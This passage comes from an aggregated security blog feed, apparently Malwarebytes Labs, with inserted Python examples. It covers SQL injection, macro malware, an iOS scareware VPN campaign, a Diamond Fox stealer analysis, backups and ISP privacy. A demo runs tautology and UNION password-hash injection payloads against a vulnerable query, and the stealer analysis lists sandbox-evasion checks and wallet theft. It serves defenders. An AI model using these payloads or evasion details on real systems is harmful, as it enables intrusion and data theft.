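def find_user_safe(con, name):
    # The value travels separately from the statement; the engine never parses it,
    # so quotes, UNION and comment markers inside it are just characters.
    return con.execute("SELECT id, name FROM users WHERE name = ?", (name,)).fetchall()


# Identifiers (column and table names) cannot be bound as parameters, so the
# only safe option is an allowlist of exactly the names the application offers.
SORTABLE = {"id", "name"}


def list_users_sorted(con, column):
    if column not in SORTABLE:
        raise ValueError(f"unsortable column: {column!r}")
    return con.execute(f"SELECT id, name FROM users ORDER BY {column}").fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "x' OR '1'='1"
    dump = "' UNION SELECT id, pw_hash FROM users --"
    print("vulnerable, tautology:", find_user_vulnerable(db, tautology))   # every row
    print("vulnerable, union:    ", find_user_vulnerable(db, dump))        # password hashes
    print("safe, tautology:      ", find_user_safe(db, tautology))         # no such user
    print("safe, union:          ", find_user_safe(db, dump))              # no such user
```

The UNION payload is the realistic one: it does not just bypass a check, it reads a column the query was never meant to expose. Parameterization removes the whole class; the allowlist is there because `ORDER BY ?` is not valid in any mainstream driver, so that spot is where parameterized code quietly regresses to string building.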

4. Business Email Compromise

Sometimes, bosses are jerks. Sometimes when a boss is a jerk, their subordinates are too frightened to question an order from the boss, regardless of how out of character it might be. Attackers have weaponized this cliché of the business world by posing as the aforementioned jerk boss and demanding that large amounts of money be wired to overseas accounts as soon as possible. This scam, which is not much more complicated than shouting “Give me money!”, is called Business Email Compromise and has cost US victims $960,708,616 since 2013. There is a reasonably simple mitigation against business email compromise: if you are a boss, don’t be a jerk. Environments where individual contributors are comfortable asking the boss for clarification when given an unusual order stand a much better chance of defending against this attack.

5. Macro Malware

In the old days, MS Office had macros enabled by default. This made for a great malware delivery vector, with malicious attachments that would run all sorts of arbitrary code when opened.  Eventually, Microsoft had enough and switched Office macro support to off by default. Criminals have gotten around this restriction by simply asking the user to enable macros and thereby the malicious code. Here’s the technique cropping up in 2014, and here it is again last month. The defense against macro malware is to not enable macros, no matter how politely an attacker asks. More broadly, a collaborative document editing environment that eliminates the need to pass files around the office can defend against a wide variety of malicious attachments.
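“Don’t enable macros” is the user-side defense; the gateway-side one is to know which attachments carry VBA at all, before anyone is asked. As an added example (my code, not from the original post), the following Python checks a document’s raw bytes rather than its extension: a macro-enabled OOXML file (.docm, .xlsm, …) is a zip containing a vbaProject.bin part, and a legacy OLE2 file (.doc, .xls) with VBA carries a `_VBA_PROJECT` stream whose name is stored UTF-16LE in the OLE directory, which a byte search finds as a cheap first pass. The samples are constructed stand-ins with the same container shape, not real Office files; the OLE check is a heuristic, not a parser.

```python
import io
import zipfile

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"        # compound file header (.doc/.xls/.ppt)
ZIP_MAGIC = b"PK\x03\x04"                                # OOXML containers (.docx/.docm/.xlsm/...)
VBA_STREAM_UTF16 = "_VBA_PROJECT".encode("utf-16-le")    # stream name as stored in the OLE directory


def has_macros(data):
    """Return (bool, reason) for the raw bytes of an attachment, ignoring its extension."""
    if data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = [n.lower() for n in zf.namelist()]
        except zipfile.BadZipFile:
            return False, "zip signature but unreadable archive"
        for n in names:
            if n.endswith("vbaproject.bin"):
                return True, "OOXML part " + n
        return False, "OOXML without VBA part"
    if data.startswith(OLE_MAGIC):
        # Heuristic: the UTF-16LE directory entry name is a strong sign a VBA storage exists.
        if VBA_STREAM_UTF16 in data:
            return True, "OLE2 document with _VBA_PROJECT stream"
        return False, "OLE2 document, no VBA stream name found"
    return False, "not an Office container"


def _ooxml(parts):
    """Build a minimal OOXML-shaped zip from {part_name: bytes}; constructed test input only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, blob in parts.items():
            zf.writestr(name, blob)
    return buf.getvalue()


# Constructed samples (not real documents), shaped like what Office would write.
SAMPLE_DOCX = _ooxml({"[Content_Types].xml": b"<Types/>", "word/document.xml": b"<w:document/>"})
SAMPLE_DOCM = _ooxml({"[Content_Types].xml": b"<Types/>", "word/document.xml": b"<w:document/>",
                      "word/vbaProject.bin": b"\x01\xb6\x00\x00 constructed stub"})
# Fake OLE2 header followed by a directory-style UTF-16LE stream name.
SAMPLE_DOC_VBA = OLE_MAGIC + b"\x00" * 504 + VBA_STREAM_UTF16 + b"\x00" * 40
SAMPLE_DOC_PLAIN = OLE_MAGIC + b"\x00" * 504 + "WordDocument".encode("utf-16-le")

if __name__ == "__main__":
    for label, blob in (("docx", SAMPLE_DOCX), ("docm", SAMPLE_DOCM),
                        ("doc+vba", SAMPLE_DOC_VBA), ("doc", SAMPLE_DOC_PLAIN)):
        print(f"{label:8s} {has_macros(blob)}")
```

Sniffing the container rather than trusting the extension matters because Office opens a file by content: a macro-enabled document renamed to .docx or .rtf still runs its VBA once the user clicks Enable.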

In summary, a great many cyber threats are not sophisticated nation-state level, well thought out attacks. The bulk, in fact, tends to be the least effort required for success, which sometimes turns out to be not very much effort at all.

The post The top 5 dumbest cyber threats that work anyway appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malvertising on iOS pushes eyebrow-raising VPN app

Malwarebytes - Thu, 04/06/2017 - 17:10

There is a preconceived idea that malvertising mostly affects the Windows platform. Certainly, when it comes to malicious adverts, Internet Explorer is a prime target for malware infections. However, malvertising can produce different outcomes adapted to the device the user is running.

Case in point, we discovered this scareware campaign that pushes a ‘free’ VPN app called My Mobile Secure to iOS users via rogue ads on popular Torrent sites. The page plays an ear-piercing beeping sound and claims your device is infected with viruses.

“We have detected that your Mobile Safari is (45.4%) DAMAGED by BROWSER TROJAN VIRUSES picked up while surfing recent corrupted sites.”

Such alerts on mobile devices are not new and are sadly commonplace via many ad networks these days. Usually, aggressive affiliates remunerated per lead will use these kinds of tactics to drive traffic to game apps or even tech support scams.

Thankfully for the latter, Apple has released an update to their mobile operating system (iOS 10.3.1) to avoid so-called “browser lockers” via incessant JavaScript popups that prevented users from closing the offending page. Having said that, social engineering attacks such as the one above are still active and prey on the surprise effect or culpability someone may experience after browsing sites with pirated material.

Network traffic

This malvertising chain starts off with an ad call from Propeller Ads Media, goes through Real Time Bidding (RTB) via AdMetix, is redirected to RevenueHits, and finishes off with scammy advertisers.

‘Free’ VPN app

This fake website advertises the MyMobileSecure VPN to remove “infected applications and files”. Tapping on ‘Remove Virus’ opens up the App Store to download this app.

The MyMobileSecure developer, VoiceFive is a comScore, Inc. company, “a leading global market research company that studies and reports on Internet trends and behavior.” In order to activate the free VPN app, users must join the MobileXpression research community, and this is where things get interesting.

From mymobilescure.com: “The MobileXpression email account is a part of the software download package for iPhones and iPads. The email account is there to provide you with a better way to stay in touch with MobileXpression and also make sure our software works correctly.”

If the product is free, you are the product

According to their website, MobileXpression is a market research panel designed to understand the trends and behaviors of people using the mobile Internet. This seems a bit peculiar when applied to a VPN product, whose goal is precisely to anonymize your online activity by hiding it, through encryption, from your ISP, government, bad guys, etc.

As an aside, the topic of VPNs is particularly hot at the moment, on the heels of an upcoming bill (S.J. Res. 34) that would allow Internet Service Providers (ISPs) to sell data about your online habits to advertisers. Many people are rushing into installing the first VPN they can get their hands on, which is a terrible idea considering many companies out there are very shady and far worse than your own ISP.

Free does not mean Open Source or risk-free for that matter. But the fact of the matter is that people tend to gravitate towards free products, especially if those are pushed aggressively via hungry advertisers. For this reason, users should pay even more attention before installing a free app.

If the reason you want to install a VPN is because you are truly worried about your online privacy, then you really ought to read the fine print. This particular VPN app has some concerning statements:

If you shop around for other VPN providers, you will see the exact opposite when it comes to data collection and logging. Here are some examples:

  • [VPN x] never logs where you go on the Internet. If anyone asks, the best we can do is shrug our shoulders.
  • [VPN y] makes it impossible to identify the type of traffic or protocol you are using, even for your ISP.
  • [VPN z] doesn’t store any connection logs whatsoever. In addition, we do not log bandwidth usage, session data or requests to our DNS servers.

Some even provide Bitcoin as a mode of payment to completely anonymize the registration process, via a throwaway email address for example.

VPN providers and trust

Oftentimes, affiliates are not properly policed, and we observe scare tactics used to force the installation of various pieces of software. It’s important to note that those affiliates are normally distinct from the software vendors themselves, but scammy behaviors end up reflecting poorly on everyone.

In this particular case, one cannot help but feel that this VPN application comes with some serious baggage and unfortunately the average user will not take the time to review the fine details. If the intent is to use a VPN to anonymize your online activities, this does almost the opposite.

One statement from mobileXpression is particularly striking:

We make commercially viable efforts to automatically filter confidential personal information such as UserID, password, credit card numbers, and account numbers. Inadvertently, we may collect personal information about our panelists; and when this happens, we make commercially viable efforts to purge our database of such information.

This summarizes the issue quite clearly: said data should never be collected in the first place because some very unfortunate things can happen once it is logged in a database. Haven’t there been enough data breaches lately to be seriously concerned with what kind of data a company may collect (inadvertently or not)?

Choosing the right VPN application these days has become very challenging due to the renewed interest in online privacy (there are other reasons people buy VPNs as well, such as to bypass geo-restrictions from services like Netflix, the BBC, etc). It’s important to take the time to review the companies behind those products, their policies, and real reviews, not fake or sponsored ones. At the end of the day, you are placing your data and trust in someone else’s hands.

Kudos to CloudFlare for terminating the scareware domain in less than five minutes.


The post Malvertising on iOS pushes eyebrow-raising VPN app appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Diamond Fox – part 2: let’s dive in the code

Malwarebytes - Thu, 04/06/2017 - 15:00

In a previous post we made an initial analysis of a Diamond Fox bot delivered by the Nebula Exploit Kit (more about the campaign can be found here). We described the way to unpack the protection layer in order to get the core, written in Visual Basic, that can be decompiled. In this second part of the series, we will take a deeper look into the code and analyze the bot’s features and code design.

Analyzed samples

988e9fa903cc2fbb80e7221072fb2221 – Diamond Fox Crystal (final VB payload)

3ef960da3e4bc4bc7c05d02fbf121d4e – old Diamond Fox (final VB payload)

Changelog

In the release that is sold on the black market, the authors included a changelog describing all versions up to the current one (codenamed Crystal). Below, you can see the related fragment:

Crystal Version
[+] Loader core recoded
[+] Improved Size: 17.5 kb
[+] Added unlimited panel list
[+] Added domain generation algorithm
[+] Added RunOne startup
[+] Added Polices startup
[+] Added auto-screenshots
[+] added Install redirects
[+] Added Anti-WinPcap
[+] Added Anti-Virustotal VM
[+] Added Anti-Emulation
[-] Removed Anti-Wine
[-] Moved Startup Persistance to Persistance
[+] Added Botkiller
[+] Added Anti-Avast Sandbox
[+] Added PE configuration storage
[+] Improved Configuration preview
[+] Added optional usb spread on lite bot
[+] Added RDP plugin
[+] Added VNC Grabber
[+] Added remote shell
[+] Added Close bot command
[+] Added Shutdown PC command
[+] Improved web panel installer
[+] Added Restart PC command
[+] Added more bot selection options on tasks
[+] Improved task manager
[+] Added search on reports
[+] Improved panel settings
[+] Added Layer7 DDoS
[+] Added reports bars statistics
[+] Added New/dead bots per week statistics
[+] Updated Geodata
[+] Added Bot remover tool
[+] Added DGA tool
[+] Improved real-time notifications on panel
[+] Added Desktop/Laptop Detection
[+] Added administrator detection
[+] Improved bot full information
[+] Added mark as favorite
[-] removed %PROGRAMFILES% installation path
[+] added %USERPROFILE% installation path
[-] removed %WINDIR% installation path
[+] added %LOCALAPPDATA% installation path
[-] Removed winlogon startup
[+] Added schtaks startup
[-] Removed Anti-apateDNS
[-] Removed Anti-Norman
[-] Removed Anti-wiresshark
[-] Removed Xor Encryption
[+] Added captcha on web panel login
[+] Added antibruter forcer on web panel login
[+] Added new panel logo
[+] Improved Crypto wallet stealer (+24)
[+] Improved Homepage changer (added internet explorer)
[+] Improved Keylogger(added clipboard detector and window title trigger)
[+] Improved bot speed
[+] Improved bot compatibility
[+] Improved bot stability
[-] Removed Services tab on web panel
[+] Added protected folder on installation
[+] Now the webpanel can be installed on windows without errors

Decompiling

As we mentioned in the previous post, Diamond Fox is written in Visual Basic and after unpacking it can be decompiled by VB Decompiler. Unfortunately, the results of the decompilation are not fully accurate and some parts of the code are difficult to analyze. However, we can still figure out the most important actions performed by the malware.

We provided a partially cleaned version of the decompiled code: https://gist.github.com/hasherezade/79de1509c8565ec7496cd554092df6f8#file-module1-vb.

Execution flow

Diamond Fox starts its execution by decrypting and parsing the configuration; in this edition, it is stored in the section “L!NK”. Then, depending on the configuration, some further features are enabled or disabled. For example, it may deploy defensive checks against sandboxes and Virtual Machines.

The stored parameters are encrypted and they are decrypted at runtime – however, the decryption function is no longer a simple XOR known from the previous versions:

(see a partially cleaned version of this function: https://gist.github.com/hasherezade/79de1509c8565ec7496cd554092df6f8#file-decrypt-vb )

Along with the features that can be enabled or disabled depending on the configuration, Diamond Fox offers features that are controlled from the CnC.

Reading response from the CnC:

Parsing commands and executing appropriate actions (commands are identified by numbers – from 0 to 25):

Features

Let’s have a look inside the code and follow the features mentioned by the authors.

[+] Loader core recoded

The code of the malware has been reorganized and large portions of it have been rewritten. This can be noticed at first sight if we decompile the new version and compare it with the old one. In the current version everything is in one module, while in the previous versions the code was subdivided into various modules.

Old Diamond Fox decompiled (fragment):

We can see the code subdivided into modules with descriptive names, making analysis easier. In the new version, we will not find this familiar layout.

Decompiled code of Diamond Fox Crystal (the new one):

The new version introduced a different way of storing the configuration. Now, the encrypted configuration is in a dedicated section named “L!NK”.
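As an added example (not part of the original analysis or of the gist linked above), the following Python locates that section in a PE image by walking the section table and returns its raw, still-encrypted contents; the sample PE it runs on is constructed inline, and the "encrypted config" bytes are a placeholder, not real Diamond Fox data.

```python
import struct
from typing import Dict, Optional

# Section name Diamond Fox Crystal uses for its encrypted configuration (from the analysis above).
CONFIG_SECTION = "L!NK"


def parse_sections(pe: bytes) -> Dict[str, bytes]:
    """Walk the PE section table and return {section name: raw section bytes}.

    Only the header fields needed to reach the section table are read; a
    section whose raw pointer/size run past the end of the file is rejected
    instead of silently returning a truncated blob.
    """
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    first = coff + 20 + size_opt                     # section headers follow the optional header
    sections: Dict[str, bytes] = {}
    for i in range(num_sections):
        name, vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, first + 40 * i)
        name = name.rstrip(b"\x00").decode("latin-1")
        length = min(raw_size, vsize) if vsize else raw_size   # drop file-alignment padding
        if raw_ptr + length > len(pe):
            raise ValueError(f"section {name!r} points outside the file")
        sections[name] = pe[raw_ptr:raw_ptr + length]
    return sections


def extract_config_blob(pe: bytes) -> Optional[bytes]:
    """Return the still-encrypted contents of the L!NK section, or None if the
    sample has no such section (i.e. it is not laid out like Diamond Fox Crystal)."""
    return parse_sections(pe).get(CONFIG_SECTION)


def build_sample_pe(sections: Dict[str, bytes]) -> bytes:
    """Construct a minimal, non-runnable PE image (headers plus raw section data).

    This is a constructed stand-in for a real sample so the example runs offline;
    every header field the parser does not need is left zero.
    """
    file_align = 0x200

    def align(v: int) -> int:
        return (v + file_align - 1) // file_align * file_align

    size_opt = 0xE0                                  # PE32 optional header size (contents zeroed)
    headers_len = 0x40 + 4 + 20 + size_opt + 40 * len(sections)
    raw_ptr = align(headers_len)
    sect_hdrs, raw_data = b"", b""
    for name, data in sections.items():
        size_raw = align(len(data))
        sect_hdrs += struct.pack("<8sIIIIIIHHI", name.encode("latin-1").ljust(8, b"\x00"),
                                 len(data), raw_ptr, size_raw, raw_ptr, 0, 0, 0, 0, 0x40000040)
        raw_data += data.ljust(size_raw, b"\x00")
        raw_ptr += size_raw
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)   # e_lfanew at offset 0x3C -> 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x0102)
    headers = dos + b"PE\x00\x00" + coff + b"\x00" * size_opt + sect_hdrs
    return headers.ljust(align(headers_len), b"\x00") + raw_data


# Constructed sample: a code section plus an L!NK section holding placeholder "encrypted" config bytes.
CONSTRUCTED_CONFIG = b"\x13\x37" + b"placeholder-encrypted-diamondfox-config" + b"\x00"
SAMPLE_PE = build_sample_pe({".text": b"\x90" * 16, CONFIG_SECTION: CONSTRUCTED_CONFIG})

if __name__ == "__main__":
    blob = extract_config_blob(SAMPLE_PE)
    print("sections:", list(parse_sections(SAMPLE_PE)))
    print("L!NK blob:", blob.hex() if blob else None)
```

Decrypting the returned blob is a separate step, since the new routine is no longer the simple XOR of earlier versions.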

[+] Added domain generation algorithm

In the analyzed sample this feature was not enabled and the CnC address was static. However, looking at the code we can find a domain generation algorithm (DGA) that is based on the current date:

(see a partially cleaned version of this function: https://gist.github.com/hasherezade/79de1509c8565ec7496cd554092df6f8#file-domain_generate-vb)

[+] Added Anti-Emulation

Checking whether the sample is running in a VM or sandbox by attempting to load DLLs associated with virtual environments:

  • vboxmrxnp
  • SbieDll
  • snxhk
  • pthreadVC

It also comes with a set of blacklisted volume serial numbers, identifying popular sandboxes:

  • AC79B241
  • 70144646
  • 6C78A9C3

[+] Added Desktop/Laptop Detection

Checking whether it is running on a laptop by testing for battery presence:

[+] Added PE configuration storage

The section L!NK is used not only to store initial configuration, but also some fetched data.

The random ID of the bot is generated and stored:

[+] Improved Crypto wallet stealer (+24)

We can find in the code strings used to search several crypto wallets:

MultiBit, Armory, Electrum, digital, -LTC, MultiDoge, BitcoinDark, Unobtanium, Dash, Bit, Lite, Name, PP, Feather, Nova, Prime, Terra, Dev, Anon, Pay, World, Quark, Infinite, Doge, Asic, Lotto, Dark, Mona

Analyzing the code deeper, we find that first the .wallet files are searched:

The found data is grabbed and passed into another function:

That function is responsible for posting the grabbed content to the CnC server:

[+] Added captcha on web panel login

We can observe it if we try to follow the address of the CnC captured during the behavioral analysis. Indeed, next to the credential fields we can see a very simple captcha:

[+] Added new panel logo

The authors of Diamond Fox put a lot of effort into making the graphic design attractive to the user. This time, the panel comes with a set of logos that change randomly on page refresh. This feature may seem fancy and redundant in malware; however, it shows the effort put into the user experience.

[+] Improved Keylogger(added clipboard detector and window title trigger)

As we saw during behavioral analysis, Diamond Fox generates neatly formatted reports about captured users’ activities. They include Clipboard content and the title of the main window, where the particular text was typed:

Conclusion

Diamond Fox Crystal has been solidly refactored in comparison to the older versions. Removing the descriptive module names made analysis more difficult. Due to the change in the method of encrypting the configuration, retrieving its content is no longer trivial.

Overall, Diamond Fox comes with the typical features that we can expect from a stealer. In spite of some improvements, the code quality is still nothing impressive.

Appendix

https://www.cylance.com/a-study-in-bots-diamondfox – about an older version of Diamond Fox

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going into the details of malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.

The post Diamond Fox – part 2: let’s dive in the code appeared first on Malwarebytes Labs.

Categories: Techie Feeds

3, 2, 1, GO! Make backups of your data!

Malwarebytes - Wed, 04/05/2017 - 15:00

With the recent proliferation of ransomware, a type of malware that encrypts your data and holds it hostage until payment is received, what should be done to protect valuable data?

One of the best defences against this threat is having a good backup strategy. This protects your data against all sorts of unpleasant mishaps. How frequently you make them, what you make them to, where they are stored, and deploying the automation required to maintain said backup regimen are also crucial. We should all be familiar with making backups, but there is a useful rule of thumb called the “3-2-1 rule”.

A good backup regimen could mean the difference between surviving a catastrophic event such as ransomware or shutting down the business. Let’s use an example file called “Important_stuff.txt” to explain how this all works.

3 Different copies!

For an effective backup plan, you should have at least 3 different copies of this file. A good example would be:

  • One on a workstation, stored locally for editing or on a local server, for ease of access.
  • One stored on a cloud backup solution.
  • One stored on a long-term storage such as a drive array, replicated offsite, or even an old school tape drive.

This diversity of backups is there to ensure your documents are available with added redundancy. If the hard drive on your workstation fails, you have a backup on the server. Server down? The cloud copy is still an option.

If the ransomware did its thing while the server share was mounted to your workstation, it might also be encrypted. Here the cloud copy would save the day.

This is the reason why having 3 different copies is a good idea.


2 Different forms of media!

In the example given above, we had 3 copies of our file. The type of media this file is saved to is also important. The hard drive of the workstation and the external share are fundamentally the same, but the cloud storage is different, as are the tape drive and the disk.

The different media rule most probably harkens back to the days of tape drive backups. If your backup regimen lacked diversity and consisted of only tape drives, it was vulnerable to a failure of the tape drive reader.

This scenario is where the main hard drive fails and the tape drive reader ALSO fails. As tape drives were a long-term storage option, it wouldn’t be uncommon for a replacement tape drive reader to become hard to source. This means that finding a new or functioning reader could become difficult, making your backups inaccessible.

The takeaway is that media diversity is equally important. You could store “Important_stuff.txt” on multiple different media, just as long as all your eggs aren’t in the same technological basket.

Having a diversity of media helps reduce the chances that all possible avenues of recovery will be inaccessible through equipment failure.

1 Copy stored offsite!

One copy of the backup should be stored offsite. If the head office burns down, it won’t matter how many backups you had. In our example, storing “Important_stuff.txt” on a tape drive and having it in a safety deposit box at your bank would negate the “office-burning-down” scenario as well as the perfect storm of ransomware encrypting everything.

Offsite copies will help mitigate a localized event.


A word on security.

You should make all best efforts to secure these backups. For an attacker, “Important_stuff.txt” is something that is immediately identified as a high-value item. Remember that if you store your backup in the cloud, the stewards of this cloud could have access to them. Portable drives are, well… portable, and by this I mean they can be portable in someone else’s pocket!

  • Use strong passwords on that offsite cloud service. Select cloud backup solutions that are zero-knowledge. (The stewards of the cloud don’t have access to your data in unencrypted form!)
  • Encrypt the data backed up to external solutions.
  • Store these backups in a safe place, preferably under lock and key.

The examples above show encryption used beneficially, as opposed to how it is used by ransomware authors.
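As an added example that is not from the original post, here is a small policy-as-code check of a backup inventory for one file against the 3-2-1 rule plus the encryption advice above; the inventories, and the `mounted` flag that models the mounted-share ransomware case described earlier, are constructed for illustration.

```python
from dataclasses import dataclass, replace
from typing import List


@dataclass(frozen=True)
class BackupCopy:
    label: str
    media: str        # e.g. "hdd", "cloud", "tape"
    offsite: bool     # physically away from the office
    encrypted: bool   # encrypted before it leaves your hands
    mounted: bool     # reachable from the workstation as a drive/share (assumption: models the
                      # "server share mounted while ransomware ran" case from the post)


def audit_321(copies: List[BackupCopy]) -> List[str]:
    """Check the copies of one file against the 3-2-1 rule and the post's security
    notes; returns the list of violations (an empty list means the plan passes)."""
    findings: List[str] = []
    if len(copies) < 3:
        findings.append(f"3 copies: only {len(copies)} found")
    media = {c.media for c in copies}
    if len(media) < 2:
        findings.append(f"2 media: all copies are on one media type ({', '.join(sorted(media)) or 'none'})")
    if not any(c.offsite for c in copies):
        findings.append("1 offsite: no copy survives a localized event such as a fire")
    for c in copies:
        # Anything that leaves the premises or sits with a cloud steward must be encrypted first.
        if (c.offsite or c.media == "cloud") and not c.encrypted:
            findings.append(f"security: {c.label!r} leaves your control unencrypted")
    if copies and all(c.mounted for c in copies):
        findings.append("isolation: every copy is mounted; ransomware on the workstation can reach them all")
    return findings


# Constructed inventories for "Important_stuff.txt", mirroring the post's example.
GOOD_PLAN = [
    BackupCopy("workstation disk", "hdd", offsite=False, encrypted=False, mounted=True),
    BackupCopy("zero-knowledge cloud backup", "cloud", offsite=True, encrypted=True, mounted=False),
    BackupCopy("tape in bank safety deposit box", "tape", offsite=True, encrypted=True, mounted=False),
]

# A common "we have backups" setup: the file on the workstation and on a mounted server share.
NAIVE_PLAN = [
    BackupCopy("workstation disk", "hdd", offsite=False, encrypted=False, mounted=True),
    BackupCopy("office file server share", "hdd", offsite=False, encrypted=False, mounted=True),
]

# The good plan, but with the cloud copy uploaded in cleartext.
CLOUD_PLAINTEXT_PLAN = [GOOD_PLAN[0], replace(GOOD_PLAN[1], encrypted=False), GOOD_PLAN[2]]

if __name__ == "__main__":
    for name, plan in [("good", GOOD_PLAN), ("naive", NAIVE_PLAN), ("cloud-plaintext", CLOUD_PLAINTEXT_PLAN)]:
        print(name, "->", audit_321(plan) or "passes 3-2-1")
```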


Good automation and discipline!

The single greatest obstacle to a proper 3-2-1 backup regimen is the discipline required to maintain it. A good way to mitigate this is to automate the backup process. The backing up of “Important_stuff.txt” should be transparent to its owner.

Having backups gives you the option to deny ransomware authors by choosing the painful option and restoring from backups…

You could also install our product to mitigate ransomware attacks. (This should not be thought of as a replacement for a good backup strategy!)


Payment must be the absolute last resort.

Any option other than paying the cybercriminals for a decryption key is preferable. This is why when we see news reports recommending paying the ransom we collectively shake our heads. Encouraging familiarity with the Bitcoin ecosystem isn’t bad at all. Crypto-currencies are fascinating. Having some stored on hand for a quick payment, however, implies a fundamental failure.

Remember, when you pay the bad guys, you reinforce the viability of these types of attacks. You are teaching them that ransomware works.


The post 3, 2, 1, GO! Make backups of your data! appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Your ISP, browsing history, and what to do about it

Malwarebytes - Tue, 04/04/2017 - 17:17

In late March, Congress approved a bill lifting restrictions imposed on ISPs last year concerning what they could do with information such as customer browsing habits, app usage history, location data, and Social Security numbers. They additionally absolved ISPs of the need to strengthen their existing customer data holdings against hackers and thieves. For more on the particulars of the bill, you can see reports on the Washington Post and Ars Technica. Given that the repealed restrictions hadn’t yet come into effect, the immediate impact of the new bill is somewhat unclear. But given what typically happens with massive stores of aggregated, location-specific customer data, the prognosis is not good.

So what’s the worst that can happen? Let’s run through a few probable outcomes:

Ad retargeting

We all might be familiar with this: when we buy a product online and then see ads for it relentlessly for a couple of weeks thereafter. But with increased granularity of metadata, ad retargeting can be significantly more ‘effective.’ As an example, certain tech support scam companies prefer to draw their staff directly from complicit drug detoxes and rehabs, largely in order to ensure a compliant, desperate employee base. So the next time someone searches for help with an intractable heroin addiction, they might get targeted ads for unlicensed rehabs that come with a new job opportunity of scamming the elderly. Perhaps if my browser history correlates to those of low income or unemployed people, my ads would fill with work from home scams. Or low literacy search phrasing, in conjunction with low income, could get me directed to multi-level marketing scams. There is a cornucopia of ways to target the weak and vulnerable via metadata, and it’s both legal and profitable.


Stalking

As we can see with many domestic violence cases, abusers have no compunction against using technology to stalk and harass their victims. A 2014 article by NPR surveyed a series of domestic violence shelters and found 75% of their clients had dealt with abusers monitoring them remotely using hidden mobile apps. Some ill-conceived apps have linked multiple sets of user data together, to create inadvertent ‘stalking apps’. Once search metadata is openly sold, a person suffering domestic abuse would have a hard time searching for a local shelter without their partner knowing about it. Even with new homes and new identities, a victim would have to live with the fear of their search patterns combined with IP address identifying them, permanently. Stalking via metadata has been seen as an issue before and it will most likely happen again.


Browser History Ransom

We’ve seen doxware in the wild before. But when the barrier to entry is lowered to simply having enough money to purchase the incriminating data in question, why wouldn’t more criminals get in on the game? As seen with ransomware and tech support scams, when technical limitations to a crime are removed, people willing to try it multiply exponentially. Ransoming a victim’s browser history would seem to be easy money.


Time to Breach

Essentially, once this data begins to be collected, stored, and prepared for sale, there is a stopwatch set for time to breach and dissemination of your data to the highest bidder on the dark web. Think that’s hyperbolic? In 2015 Comcast published the personal data of almost 75,000 California customers due to operator error. In a separate incident in the same year, 200,000 Comcast customers had their data sold on the dark web. In 2014, Comcast hadn’t patched their mail servers adequately and hackers made off with extensive credentials. Not to be outdone, Time Warner had their customers breached in incidents here and here. Cox Communications paid the FCC a $595,000 fine for breach of its customer data. Given the track record of handling customer data thus far, how long until the next breach?

But this is bad and I don’t want this?

Although options are limited and sometimes frustrating, there are some things you can do. To combat ad retargeting, an ad blocker works quite well. It’s awfully tough to be taken in by deceptive, fraudulent, or just too intrusive advertising if you can’t see it. However, many of the most reputable news sites rely on advertising for revenue, so they ask users to disable ad blockers in order to access content. This doesn’t really address the issue of shadowy third parties doing untoward things with your data, which brings us to…

Virtual Private Networks (VPNs)

Here be dragons, though, because many VPN providers are no more trustworthy than the ISPs that we all love so dearly. If you go to a VPN review site you can see the latest VPNs and how they stack up on quality criteria, which generally include, but are not limited to:

  • Do they keep logs of your activity?
  • How much identifiable data do they keep on you?
  • Do they have physical control over their own VPN servers?
  • What countries are their servers located in?

Check out some reviews of popular VPNs based on answers to these questions here. Another question that you should be asking is how much a VPN costs. Free ones generally find some unsavory ways to monetize your traffic, which is what you’re trying to avoid to begin with.

HTTPS Everywhere

This is a browser extension published by the Electronic Freedom Foundation. It forces websites to use a more secure HTTPS connection when the website supports it. Encrypting traffic in this way does not protect the specific websites you visit from your ISP, but it does obfuscate specific content that you’re accessing on that page. And as a browser extension, it’s fairly easy to install, and probably falls under the category of things you should be doing anyway. If you want to find out more about HTTPS Everywhere, check out their FAQ here.
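To make concrete what the ISP still sees with HTTPS, this added example (not from the original post or from HTTPS Everywhere) builds a minimal TLS ClientHello for a constructed hostname and parses the cleartext SNI hostname out of it, the way any on-path observer can; the hostname, random bytes and cipher suites are sample values.

```python
import struct
from typing import Optional

SNI_EXTENSION_TYPE = 0x0000   # server_name extension (RFC 6066)


def build_client_hello(hostname: str, with_sni: bool = True) -> bytes:
    """Construct a minimal TLS 1.2 ClientHello record (constructed sample, not a capture).

    The random bytes and cipher suites are fixed so the output is reproducible;
    a real client uses fresh randomness.
    """
    extensions = b""
    if with_sni:
        name = hostname.encode("idna")
        entry = struct.pack("!BH", 0, len(name)) + name              # name_type 0 = host_name
        name_list = struct.pack("!H", len(entry)) + entry
        ext = struct.pack("!HH", SNI_EXTENSION_TYPE, len(name_list)) + name_list
        extensions = struct.pack("!H", len(ext)) + ext
    body = (b"\x03\x03" + b"\x11" * 32                                # client_version, random
            + b"\x00"                                                # empty session_id
            + struct.pack("!H", 4) + b"\xc0\x2f\x00\x9c"             # two cipher suites
            + b"\x01\x00"                                            # compression: null only
            + extensions)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body        # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def _extract_sni(record: bytes) -> Optional[str]:
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack_from("!H", record, 3)[0]
    hs = record[5:5 + rec_len]
    if len(hs) != rec_len or len(hs) < 4 or hs[0] != 0x01:
        raise ValueError("not a complete ClientHello")
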